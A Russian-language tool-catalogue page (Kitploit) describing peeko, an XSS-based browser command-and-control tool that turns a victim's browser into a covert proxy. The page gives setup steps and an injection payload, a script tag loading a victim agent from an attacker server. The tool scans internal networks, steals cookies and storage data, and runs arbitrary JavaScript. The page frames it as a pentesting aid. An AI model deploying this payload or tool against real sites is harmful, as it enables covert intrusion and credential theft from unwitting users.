Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/b3rito/peeko
РазведкаКартирование сетиСканирование портовЛатеральное перемещениеЭксплуатация веб-приложенийЭксфильтрация данныхСбор информацииПост-эксплуатацияТестирование на ПроникновениеКомандование и Управление
GitHubb3rito/peeko
2302861 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

peeko

peeko – браузерный XSS C2 для скрытного исследования внутренней сети через заражённый браузер.

Репозиторий
Поделиться

peeko

Версия: v1.1

peeko — это браузерный C2 (Command and Control) инструмент на основе XSS, который использует браузер жертвы в качестве скрытого прокси внутри внутренних сетей.

Через внедрённый XSS-пейлоад peeko устанавливает WebSocket-соединение с центральным сервером, позволяя атакующему удалённо управлять браузером жертвы для отправки запросов к внутренним сервисам, сканирования сетей, эксфильтрации данных или даже выполнения произвольного JavaScript — всё это без доставки на устройство жертвы ни одного бинарного файла.


Возможности

  • WebSocket-связь между атакующим и жертвами
  • Браузер жертвы запрашивает внутренние URL и сканирует IP-диапазоны и порты
  • Простая панель управления, включающая:
    • Выбор жертвы
    • Ручной запрос URL
    • Сканер IP-адресов и диапазонов портов
    • Выполнение произвольного JS (вручную или автоматически)
    • Доставку файлов (авто/вручную)
    • Сбор информации о браузере и токенов (cookies, хранилища и т. д.)
    • Просмотр логов с копированием и сохранением в .txt или .json
  • Поддержка HTTPS с самоподписанными сертификатами
  • Лёгкий: один Python-файл + статические ресурсы

Требования

  • Python 3.8+
  • OpenSSL
  • Linux/macOS (протестировано на системах на базе Debian)

Быстрый старт

  1. Клонируйте репозиторий:

    root@kitploit:~
    git clone https://github.com/b3rito/peeko.git
    cd peeko
    
  2. Установите зависимости:

    root@kitploit:~
    make install
    
  3. (Необязательно) Сделайте скрипты исполняемыми:

    root@kitploit:~
    chmod +x gen-cert.sh start.sh
    
  4. Сгенерируйте самоподписанный TLS-сертификат:

    root@kitploit:~
    make cert
    
  5. Замените заполнитель SERVER-IP:

    Откройте и отредактируйте следующие файлы:

    • static/agent.js
    • static/control.html

    Замените SERVER-IP на IP-адрес/домен вашего сервера:

    root@kitploit:~
    wss://SERVER-IP:8443/ws → wss://192.168.30.136:8443/ws
    
  6. Запустите сервер:

    root@kitploit:~
    make run
    
  7. Откройте панель управления в вашем браузере:


Возможности панели управления

Основные функции

  • Выбор подключённых жертв и управление ими
  • Запрос любого внутреннего/внешнего HTTPS URL через жертву
  • Сканирование LAN-диапазонов: 192.168.1.0/24, 10.0.0.10-20 и т. д.
  • Сканирование определённых портов или диапазонов (например, 80, 443,8000-8080)

Доставка файлов

  • Отправка файлов жертве (Base64 через WebSocket)
  • Браузер жертвы автоматически загружает их
  • Поддерживается автоматическая передача файлов при подключении

Сбор информации

  • Сбор User Agent, платформы, referrer, cookies, local/sessionStorage
  • Просмотр результатов в JSON
  • Запускается вручную или автоматически собирается при подключении

Выполнение пользовательского JS

  • Выполнение произвольного JavaScript в браузере жертвы
  • Используйте формат exec:... для отправки
  • Поддерживает автозапуск при подключении
  • Пример: exec:alert(document.cookie);

Логирование

  • Всё логируется (запросы, ответы, выгрузки информации)
  • Копирование или экспорт логов в .txt или .json
  • Минималистичный интерфейс, выполненный в виде терминального лога

Объяснение CORS и смешанного контента

Современные политики браузеров влияют на то, к чему peeko может получить доступ.

Ответы CORS

ЗаголовокМожно прочитать содержимое?Примечания
Access-Control-Allow-Origin: *✅Полный доступ к ответу
Без заголовка⚠️Ответ непрозрачен

Смешанный контент

Жертва подключается через HTTPS. Если сканируемая цель использует только HTTP:

  • Браузер заблокирует запросы смешанного контента
  • peeko не может читать данные с http://-адресов
  • При сканировании всегда предпочитайте цели, использующие HTTPS

На практике

Во время пентеста, если вы найдёте внутренний сервис, который отвечает с заголовком Access-Control-Allow-Origin: * и обслуживается по HTTPS, то peeko становится скрытым прокси, способным эксфильтровать внутренние данные напрямую из браузера жертвы — без доставки каких-либо файлов и без открытия исходящих соединений.


Структура проекта

root@kitploit:~
peeko/
├── main.py             → FastAPI WebSocket server  
├── start.sh            → Launch server  
├── gen-cert.sh         → Generate self-signed TLS certificate  
├── Makefile            → Install/run helpers  
├── requirements.txt    → Python dependencies  
├── certs/              → TLS key and cert will be stored here  
└── static/             → Browser client assets  
    ├── control.html    → Control panel (was attacker.html)  
    ├── infect.html     → Victim landing page  
    └── agent.js        → Victim agent script  

Рабочий процесс

  1. Атакующий внедряет XSS (через сохранённую или отражённую уязвимость)
  2. Браузер жертвы подключается через WebSocket к серверу peeko
  3. Панель управления позволяет атакующему:
    • Сканировать сеть
    • Запрашивать URL
    • Собирать cookies и данные хранилищ
    • Выполнять произвольный JS
    • Эксфильтровать ответы
    • Доставлять файлы

Варианты использования

  • Картирование внутренней сети через XSS
  • Pivoting на основе браузера
  • Тихая доставка файлов / JS-дроппер

Отказ от ответственности

Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования.
Любое использование peeko вне сред, где у вас есть явное разрешение, строго запрещено.
Вы несёте ответственность за свои действия.


Авторы

Авторы: b3rito из mes3hacklab и GioPpeTto

Скачать инструмент
root@kitploit:~
https://192.168.30.136:8443/static/control.html
  • Внедрите агента (пример XSS):

    root@kitploit:~
    <script src="https://192.168.30.136:8443/static/agent.js"></script>
    
  • Ограниченный источник❌Заблокирован или не читается